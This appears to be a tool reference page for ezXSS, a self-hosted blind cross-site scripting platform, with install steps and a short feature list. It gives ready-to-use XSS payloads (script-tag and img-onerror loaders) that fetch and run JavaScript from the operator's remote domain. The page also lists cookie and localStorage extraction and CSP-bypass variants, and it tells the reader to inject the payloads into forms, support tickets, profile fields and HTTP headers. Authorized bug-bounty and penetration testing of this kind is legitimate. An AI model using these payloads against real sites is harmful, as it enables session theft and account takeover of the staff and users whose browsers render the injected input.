Description
ezXSS is an easy-to-deploy platform for finding blind XSS vulnerabilities. It provides a self-hosted dashboard to manage payloads, track executions, and collect data when your blind XSS payloads fire. Features email notifications and detailed execution reports.
Installation
BASH
# Requirements: PHP 7.4+, MySQL/MariaDB, Web server
git clone https://github.com/ssl/ezXSS.git
cd ezXSS
# Configure database
cp .env.example .env
# Edit .env with database credentials
# Install dependencies
composer install
# Set up database
php artisan migrate
# Configure your web server to point to the public/ directoryBasic Usage
JAVASCRIPT
// After setup, use generated payloads from the dashboard
"><script src=https://your-ezxss-domain.com/p.js></script>
// Short payload
<script src=//your-ezxss.com/p.js></script>
// Image-based
<img src=x onerror="s=document.createElement('script');s.src='//your-ezxss.com/p.js';document.head.appendChild(s)">Advanced Usage
TEXT
# Dashboard features:
# - Custom payload generation with encoding options
# - Email alerts when blind XSS fires
# - Screenshot capture of execution context
# - Cookie/localStorage extraction
# - Custom JavaScript execution on callback
# - IP and User-Agent logging
# - DOM snapshot collection
# Payload customization:
# - Base64 encoded payloads
# - Polyglot payloads
# - PayloadLength-optimized versions
# - CSP-bypass variantsCommon Workflows
BASH
# Deploy ezXSS on a VPS with proper SSL
# Then inject payloads in all user-controllable fields:
# Contact forms
# Support tickets
# Profile fields (name, bio, address)
# File upload names
# HTTP headers (User-Agent, Referer, X-Forwarded-For)
# Webhook URLs
# API error messages that might be logged